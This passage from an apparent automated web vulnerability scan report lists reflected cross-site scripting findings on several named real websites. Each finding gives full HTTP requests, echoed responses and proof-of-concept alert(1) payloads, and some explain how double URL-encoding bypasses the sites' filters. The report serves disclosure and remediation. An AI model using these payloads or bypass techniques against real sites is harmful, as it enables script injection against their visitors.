<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/includes/service/ServiceRequest.phpea6fe"style="x:expression(alert(1))"340b0ad87b28b5c88?action=getMyList" target="_blank">
...[SNIP]...

2.152. http://www.barcelonapoint.com/includes/service/ServiceRequest.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /includes/service/ServiceRequest.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9a5f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25222731bd783c2 was submitted in the REST URL parameter 3. This input was echoed as b9a5f"style="x:expression(alert(1))"2731bd783c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/service/ServiceRequest.phpb9a5f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25222731bd783c2 HTTP/1.1
Host: www.barcelonapoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:19:56 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 16020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/includes/service/ServiceRequest.phpb9a5f"style="x:expression(alert(1))"2731bd783c2" target="_blank">
...[SNIP]...

2.153. http://www.barcelonapoint.com/results.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /results.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252201a2721be2b39278d was submitted in the REST URL parameter 1. This input was echoed as 73b8a"style="x:expression(alert(1))"01a2721be2b39278d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /results.php73b8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252201a2721be2b39278d?lang=en&accommType=apartment&aDay=02&aYear=2011-10&dDay=05&dYear=2011-10&aptDest=BCN&na=2&nc=0&cAge1=&cAge2=&cAge3=&cAge4=&hLang=ING&ref=hotelSearch&selectDest=BCN-&numRooms=1&nAdult1=2&nChild1=0&submit0=Search+now%21 HTTP/1.1
Host: www.barcelonapoint.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.barcelonapoint.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.barcelonapoint.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=875bdj5vpthakcctgrlm4kkkd3; __utma=196875455.901863034.1317388358.1317388358.1317388358.1; __utmb=196875455.1.10.1317388358; __utmc=196875455; __utmz=196875455.1317388358.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:23:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 17664
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/results.php73b8a"style="x:expression(alert(1))"01a2721be2b39278d?lang=en&amp;accommType=apartment&amp;aDay=02&amp;aYear=2011-10&amp;dDay=05&amp;dYear=2011-10&amp;aptDest=BCN&amp;na=2&amp;nc=0&amp;cAge1=&amp;cAge2=&amp;cAge3=&amp;cAge4=&amp;hLang=ING&amp;ref=hotelSe
...[SNIP]...

2.154. http://www.barcelonapoint.com/results.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonapoint.com
Path:   /results.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8f80%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224aa68541312 was submitted in the REST URL parameter 1. This input was echoed as b8f80"style="x:expression(alert(1))"4aa68541312 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /results.phpb8f80%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224aa68541312 HTTP/1.1
Host: www.barcelonapoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:20:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv=
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.BarcelonaPoint.com/results.phpb8f80"style="x:expression(alert(1))"4aa68541312" target="_blank">
...[SNIP]...

2.155. http://www.duiattorney.com/zip_search/zip_search.php [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.duiattorney.com
Path:   /zip_search/zip_search.php

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc879'%3balert(1)//59a76af06ac was submitted in the b parameter. This input was echoed as bc879';alert(1)//59a76af06ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /zip_search/zip_search.php?b=4682b4bc879'%3balert(1)//59a76af06ac HTTP/1.1
Host: www.duiattorney.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.duiattorney.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 80b090263a0f3ff46e492fc1c7ba24f6=aeg44qn2mlevkqrl549qtt9f90; __utma=84092300.978553822.1317389238.1317389238.1317389238.1; __utmb=84092300.1.10.1317389238; __utmc=84092300; __utmz=84092300.1317389238.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:27:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 1593
Connection: close
Content-Type: application/x-javascript

loadjscssfile('http://www.duiattorney.com/zip_search/zip_styles.php?background=4682b4bc879';alert(1)//59a76af06ac', 'css');loadjscssfile('http://www.duiattorney.com/zip_search/zip_functions.js.php', 'js');document.write('<form method="get" name="findresult" onSubmit="return getResults();" >
...[SNIP]...

2.156. http://www.duiattorney.com/zip_search/zip_search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.duiattorney.com
Path:   /zip_search/zip_search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77f06'%3balert(1)//9c92fe1bb26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77f06';alert(1)//9c92fe1bb26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /zip_search/zip_search.php?b=46/77f06'%3balert(1)//9c92fe1bb2682b4 HTTP/1.1
Host: www.duiattorney.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.duiattorney.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 80b090263a0f3ff46e492fc1c7ba24f6=aeg44qn2mlevkqrl549qtt9f90; __utma=84092300.978553822.1317389238.1317389238.1317389238.1; __utmb=84092300.1.10.1317389238; __utmc=84092300; __utmz=84092300.1317389238.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:27:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 1594
Connection: close
Content-Type: application/x-javascript

loadjscssfile('http://www.duiattorney.com/zip_search/zip_styles.php?background=46/77f06';alert(1)//9c92fe1bb2682b4', 'css');loadjscssfile('http://www.duiattorney.com/zip_search/zip_functions.js.php', 'js');document.write('<form method="get" name="findresult" onSubmit="return getResults();" >
...[SNIP]...

2.157. http://www.duiattorney.com/zip_search/zip_styles.php [background parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.duiattorney.com
Path:   /zip_search/zip_styles.php

Issue detail

The value of the background request parameter is copied into the HTML document as plain text between tags. The payload c2b61<img%20src%3da%20onerror%3dalert(1)>d07f762b724 was submitted in the background parameter. This input was echoed as c2b61<img src=a onerror=alert(1)>d07f762b724 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /zip_search/zip_styles.php?background=4682b4c2b61<img%20src%3da%20onerror%3dalert(1)>d07f762b724 HTTP/1.1
Host: www.duiattorney.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.duiattorney.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 80b090263a0f3ff46e492fc1c7ba24f6=aeg44qn2mlevkqrl549qtt9f90; __utma=84092300.978553822.1317389238.1317389238.1317389238.1; __utmb=84092300.1.10.1317389238; __utmc=84092300; __utmz=84092300.1317389238.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:27:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=3888000
Expires: Mon, 14 Nov 2011 13:27:39 GMT
Vary: Accept-Encoding
Content-Length: 2023
Connection: close
Content-Type: text/css


/* CSS Document */
#dse
{
width: 215px;
font-family: Arial,sans-serif;
font-size: 13px;
padding:3px 0;
overflow:hidden;
}
#dse_wrap{background:#efe0e0; width:200px; margin:0 3px; padding-b
...[SNIP]...
0;
   background:#fff;
   float:left;
   font:13px arial;
   color:#CCCCCC;
   margin:0px 0 0 0px;
   padding:0px;
}

.blocksearch input.go{
   width:55px;
   height:24px;
   float:left;
   background:#4682b4c2b61<img src=a onerror=alert(1)>d07f762b724;
   font-size:13px;
   cursor:pointer;
   color:#fff;
   font-weight:700;
   margin-left:0;
   padding:0px;
}
.blocksearch input.searching{
font:bold 13px arial;
   color:#000;
}
.blocksearch input.sear
...[SNIP]...

2.158. http://www.duiattorney.com/zip_search/zip_styles.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.duiattorney.com
Path:   /zip_search/zip_styles.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b688b<img%20src%3da%20onerror%3dalert(1)>34a29ec1945 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b688b<img src=a onerror=alert(1)>34a29ec1945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /zip_search/zip_styles.php?background=46/b688b<img%20src%3da%20onerror%3dalert(1)>34a29ec194582b4 HTTP/1.1
Host: www.duiattorney.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.duiattorney.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 80b090263a0f3ff46e492fc1c7ba24f6=aeg44qn2mlevkqrl549qtt9f90; __utma=84092300.978553822.1317389238.1317389238.1317389238.1; __utmb=84092300.1.10.1317389238; __utmc=84092300; __utmz=84092300.1317389238.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:27:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=3888000
Expires: Mon, 14 Nov 2011 13:27:41 GMT
Vary: Accept-Encoding
Content-Length: 2024
Connection: close
Content-Type: text/css


/* CSS Document */
#dse
{
width: 215px;
font-family: Arial,sans-serif;
font-size: 13px;
padding:3px 0;
overflow:hidden;
}
#dse_wrap{background:#efe0e0; width:200px; margin:0 3px; padding-b
...[SNIP]...
er:0;
   background:#fff;
   float:left;
   font:13px arial;
   color:#CCCCCC;
   margin:0px 0 0 0px;
   padding:0px;
}

.blocksearch input.go{
   width:55px;
   height:24px;
   float:left;
   background:#46/b688b<img src=a onerror=alert(1)>34a29ec194582b4;
   font-size:13px;
   cursor:pointer;
   color:#fff;
   font-weight:700;
   margin-left:0;
   padding:0px;
}
.blocksearch input.searching{
font:bold 13px arial;
   color:#000;
}
.blocksearch input.
...[SNIP]...

2.159. http://www.edgetechcorp.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.edgetechcorp.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33959"style%3d"x%3aexpression(alert(1))"5bec54953c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 33959"style="x:expression(alert(1))"5bec54953c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?33959"style%3d"x%3aexpression(alert(1))"5bec54953c1=1 HTTP/1.1
Host: www.edgetechcorp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=3&c2=302
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 13:15:30 GMT
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PREVIOUS_PAGE=/Default.asp; path=/
Set-Cookie: PREVIOUS_PAGE=/Default.asp; path=/
Set-Cookie: PREVIOUS_PAGE=/Default.asp; path=/
Content-Length: 72928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="c
...[SNIP]...
<a href="https://www.edgetechcorp.com/cart/UserSignIn.aspx?ReturnUrl=/Default.asp?33959"style="x:expression(alert(1))"5bec54953c1=1" id="ctl00_LoginLink">
...[SNIP]...

2.160. http://www.edgetechcorp.com/handlers/FindMemoryCSS.ashx [dhb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.edgetechcorp.com
Path:   /handlers/FindMemoryCSS.ashx

Issue detail

The value of the dhb request parameter is copied into the HTML document as plain text between tags. The payload a4603<script>alert(1)</script>64717febc73 was submitted in the dhb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /handlers/FindMemoryCSS.ashx?dhb=09da4603<script>alert(1)</script>64717febc73 HTTP/1.1
Host: www.edgetechcorp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.edgetechcorp.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREVIOUS_PAGE=/Default.asp; ASPSESSIONIDSCBATDBC=CGBFEDECJPGFKAKONHBDFLKP; __utma=190991358.1278124525.1317389209.1317389209.1317389209.1; __utmb=190991358; __utmc=190991358; __utmz=190991358.1317389209.1.1.utmccn=(referral)|utmcsr=mcafeesecure.com|utmcct=/us/forconsumers/mcafee_certified_sites.jsp|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 13:15:31 GMT
Content-Type: text/css; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Length: 2577

/* Parameters are as follows: t = Overall text color b = Background color of widget br = Border color of widget d = Drop-down background color dt = Drop-down text color dh = Drop-down h
...[SNIP]...
: block;    color: #0092DD; background-color: #ffffff; text-indent: -10px; padding: 3px 4px 3px 10px; } #edge_MemoryFinderWidget a:hover.edge_memoryLink { color: #ffffff; background-color: #09da4603<script>alert(1)</script>64717febc73; text-indent: -10px; padding-left: 10px; } #edge_MemoryFinderWidget .edge_linkHolder_wrapper { position: relative; z-index: 0; } #edge_MemoryFinderWidget .edge_linkHolder { position: absol
...[SNIP]...

2.161. http://www.giftsforeurope.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.giftsforeurope.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1956e'-alert(1)-'32e4392ea3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico1956e'-alert(1)-'32e4392ea3a HTTP/1.1
Host: www.giftsforeurope.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCSAQTDS=IOEJOLDCGMNPPEOFNIGFIBJP; __utma=181515569.2051734859.1317389188.1317389188.1317389188.1; __utmb=181515569.1.10.1317389188; __utmc=181515569; __utmz=181515569.1317389188.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:26:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 20556
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 30 Sep 2011 11:46:54 GMT
Set-Cookie: UN=METE; path=
Set-Cookie: SI=UNST; path=
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>404 Not Fo
...[SNIP]...

           }
       }
   
       function Parameter_Submit(varParameter) {
           var varAction;
           
           if (varParameter == 'currency' || varParameter == 'unit' || varParameter == 'size')
               varAction = '/favicon.ico1956e'-alert(1)-'32e4392ea3a';
           else if (varParameter == 'country')
               varAction = 'http://www.giftsforeurope.com/[lang]/[dear]/gifts.htm';
               
           varAction = varAction.replace(/\[dear\]/, document.frm_Parameter.DA.value)
...[SNIP]...

2.162. http://www.giftsforeurope.com/index_en.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.giftsforeurope.com
Path:   /index_en.htm

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db808'-alert(1)-'77511b4e3e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /db808'-alert(1)-'77511b4e3e4 HTTP/1.1
Host: www.giftsforeurope.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=216&c2=283
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Date: Fri, 30 Sep 2011 13:26:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 20546
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 30 Sep 2011 11:46:26 GMT
Set-Cookie: UN=METE; path=
Set-Cookie: SI=UNST; path=
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>404 Not Fo
...[SNIP]...
               break;
           }
       }
   
       function Parameter_Submit(varParameter) {
           var varAction;
           
           if (varParameter == 'currency' || varParameter == 'unit' || varParameter == 'size')
               varAction = '/db808'-alert(1)-'77511b4e3e4/';
           else if (varParameter == 'country')
               varAction = 'http://www.giftsforeurope.com/[lang]/[dear]/gifts.htm';
               
           varAction = varAction.replace(/\[dear\]/, document.frm_Parameter.DA.value
...[SNIP]...

2.163. http://www.golffacility.com/Search.aspx [CID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.golffacility.com
Path:   /Search.aspx

Issue detail

The value of the CID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53840"style%3d"x%3aexpression(alert(1))"6d75e867ab8 was submitted in the CID parameter. This input was echoed as 53840"style="x:expression(alert(1))"6d75e867ab8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Search.aspx?OID=2179&M=3&SD=a74139f4-1612-42e8-a9eb-4abdf2354637&AID=3&FID=43&GCID=0&FDT=1/1/0001&TDT=1/1/0001&PGW=600&IPK=0&TPK=0&UFQ=True&ACL=&CID={DC57DACD-A16B-4256-A027-9992DC9603F1}53840"style%3d"x%3aexpression(alert(1))"6d75e867ab8&TTL=0 HTTP/1.1
Host: www.golffacility.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.golffacility.com/combinedsearch.aspx?CID={DC57DACD-A16B-4256-A027-9992DC9603F1}&OID=2179&AID=3&FID=43
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=1knqmi45b5emub453jdyji55; BIGipServerpool.http.CRM=2567274506.20480.0000

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:26:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 115272
Vary: Accept-Encoding
Connection: Keep-Alive


<!doctype html public "-//w3c//dtd html 4.0 transitional//en" >
<html>
   <head>
       <title>Online Tee Times</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta c
...[SNIP]...
<a href="details.aspx?SD=31da982f-416f-470e-b469-f02649ef386a&CID={DC57DACD-A16B-4256-A027-9992DC9603F1}53840"style="x:expression(alert(1))"6d75e867ab8&OID=2179&TM=1726&M=3&TID=78908795&FID=43&GCID=162&TType=DISC">
...[SNIP]...

2.164. http://www.golffacility.com/combinedsearch.aspx [CID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.golffacility.com
Path:   /combinedsearch.aspx

Issue detail

The value of the CID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4bb%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ef31a24abb was submitted in the CID parameter. This input was echoed as 2e4bb"style="x:expression(alert(1))"8ef31a24abb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

